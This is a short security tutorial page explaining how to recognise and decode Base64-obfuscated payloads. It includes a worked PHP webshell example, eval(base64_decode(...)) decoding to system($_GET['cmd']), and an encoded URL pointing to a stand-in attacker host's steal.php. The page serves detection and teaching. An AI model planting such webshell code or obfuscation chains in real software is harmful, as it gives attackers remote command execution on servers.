Encoding & Decoding · 1 min read

Base64 Decoding for Security Analysis

Base64 turns binary data into ASCII text using a 64-character alphabet (A-Z, a-z, 0-9, +, /). Attackers use it to hide malicious payloads inside scripts, email attachments, and web page source code. The encoded string looks like random characters, but decoding it often reveals URLs, shell commands, or entire executable scripts.

Try it now

Encoder / Decoder

Runs in your browser, nothing leaves your device.

Look for long strings of alphanumeric characters ending in one or two = padding characters. In PHP malware, you'll often see `eval(base64_decode('...'))`. In JavaScript, it shows up as `atob('...')` or inside data URIs like `data:text/html;base64,...`. Email attachments use Base64 for every MIME part. If a string is divisible by 4 characters and only uses [A-Za-z0-9+/=], it's almost certainly Base64.

PHP backdoors chain Base64 with eval, gzinflate, or str_rot13 to hide webshells. A typical pattern: `eval(gzinflate(base64_decode('...')))` which first decodes, then decompresses, then executes. JavaScript droppers embed entire HTML phishing pages as Base64 data URIs. Powershell attacks use `-EncodedCommand` which accepts Base64-encoded UTF-16LE scripts.

Hidden URL in Base64

Input
aHR0cHM6Ly9ldmlsLmV4YW1wbGUuY29tL3N0ZWFsLnBocA==
Result
https://evil.example.com/steal.php

PHP webshell pattern

Input
eval(base64_decode('c3lzdGVtKCRfR0VUWydjbWQnXSk7'))
Result
system($_GET['cmd']);

Security context

Base64 is not encryption. It provides zero security, only obfuscation. Any tool can reverse it instantly. When you find Base64 in source code, the interesting question is why someone felt the need to encode it in the first place.

Paste the encoded string into a Base64 decoder tool. For chained encoding (e.g., Base64 + gzip), decode the Base64 first, then decompress. Never execute decoded content directly, as it may contain malicious code.

Not always. Base64 is used legitimately in email attachments, data URIs, and API tokens. It becomes suspicious when combined with eval(), exec(), or system() calls, or when it appears in places where readable code would be expected.

Go deeper

Continue in the Web Security Academy

Related techniques

Comparing (/4):

Tool Comparison

Feature
Type
Pricing
Platforms
Description